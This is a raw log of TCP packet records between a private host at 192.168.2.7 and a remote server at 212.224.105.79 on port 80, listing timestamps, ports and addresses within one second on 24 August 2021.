Aug 24, 2021 08:46:53.833553076 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.833569050 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.833592892 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.833631039 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.839615107 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.839636087 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.839653969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.839678049 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.839683056 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.839716911 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.844113111 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844137907 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844153881 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844171047 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844187975 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844202995 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844218969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844222069 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.844234943 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844254017 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844268084 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.844271898 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844288111 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844304085 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844316006 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844324112 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.844327927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844343901 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844358921 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844363928 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.844376087 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844392061 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844394922 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.844410896 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844419003 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.844429970 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844445944 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844460964 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844475985 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.844477892 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844494104 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844510078 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844516039 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.844525099 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844537020 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.844544888 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844559908 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.844563007 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844578981 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844592094 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.844594955 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844610929 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844625950 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844629049 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.844641924 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844655037 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.844656944 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844676971 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844679117 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.844693899 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844710112 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844726086 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.844727039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844749928 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.844750881 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.844809055 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.846484900 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.853110075 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.853135109 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.853151083 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.853171110 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.853188992 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.853204966 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.853220940 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.853220940 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.853236914 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.853251934 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.853265047 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.853281021 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.853285074 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.853333950 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.855566025 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.855596066 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.855607986 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.855621099 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.855637074 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.855673075 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.856842041 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.856863022 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.856882095 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.856933117 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.856960058 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.866719007 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.866745949 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.866780043 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.866797924 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.866815090 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.866832972 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.866844893 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.866863012 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.866874933 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.866890907 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.866908073 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.866920948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.866938114 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.866957903 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.866971016 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.866983891 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.866991043 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.866996050 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.867013931 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.867013931 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.867026091 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.867037058 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.867048979 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.867053986 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.867062092 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.867069006 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.867079020 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.867095947 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.867125988 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.867126942 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.867135048 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.867150068 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.867165089 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.867168903 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.867186069 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.867203951 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.867213011 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.867219925 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.867235899 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.867254019 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.867270947 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.867274046 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.867290974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.867299080 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.867310047 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.867326975 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.867336988 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.867343903 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.867361069 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.867368937 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.867377043 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.867394924 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.867427111 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.867465973 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.875343084 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.875365019 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.875379086 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.875395060 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.875413895 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.875432014 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.875432968 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.875447035 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.875463963 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.875478983 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.875494003 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.875495911 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.875509977 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.875525951 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.875533104 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.875545025 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.875562906 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.877664089 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.877691031 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.877707005 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.877722979 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.877727032 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.877738953 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.877789021 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.877832890 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.889494896 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.889520884 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.889537096 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.889555931 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.889574051 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.889578104 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.889590025 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.889605045 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.889605999 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.889622927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.889638901 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.889648914 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.889655113 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.889671087 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.889683008 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.889689922 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.889708042 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.889708042 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.889724016 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.889734030 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.889741898 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.889759064 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.889774084 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.889775038 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.889791012 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.889807940 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.889816999 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.889827967 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.889844894 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.889858961 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.889866114 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.889883995 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.889885902 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.889904976 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.889920950 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.889933109 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.889938116 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.889955044 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.889971972 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.889988899 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.890000105 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.890006065 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.890026093 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.890033007 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.890043020 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.890057087 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.890059948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.890075922 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.890093088 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.890103102 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.890109062 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.890125990 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.890144110 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.890144110 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.890162945 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.890172005 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.890181065 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.890197992 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.890197992 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.890214920 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.890230894 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.890249014 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.890289068 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.897579908 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.897607088 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.897624016 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.897640944 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.897656918 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.897672892 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.897689104 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.897696018 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.897706032 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.897726059 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.897746086 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.897759914 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.897762060 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.897780895 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.897785902 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.897797108 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.897823095 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.897859097 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.899791002 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.899810076 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.899849892 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.899868965 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.899884939 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.899884939 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.899940968 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.912292957 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912322044 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912333965 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912347078 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912364006 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912379980 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912395000 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912414074 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912431955 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912446976 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912467003 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912465096 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.912482977 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912498951 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912513018 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.912514925 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912530899 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912549973 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912566900 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912576914 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.912581921 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.912583113 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912595034 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912611008 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912625074 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.912630081 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912631035 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.912647963 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912663937 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912674904 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.912678957 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.912683010 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912698984 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912714005 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912738085 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912754059 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912758112 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.912761927 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.912769079 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912785053 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912801027 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912802935 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.912820101 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912837982 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912843943 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.912851095 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.912853956 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912869930 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912885904 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912897110 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912909031 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912919998 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.912925005 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912941933 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912955046 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.912955999 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912976027 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.912977934 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.912993908 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.913001060 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.913008928 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.913024902 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.913063049 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.915036917 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.919872999 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.919899940 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.919915915 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.919931889 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.919946909 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.919966936 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.919966936 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.919984102 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.920000076 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.920016050 CEST	80	49715	212.224.105.79	192.168.2.7
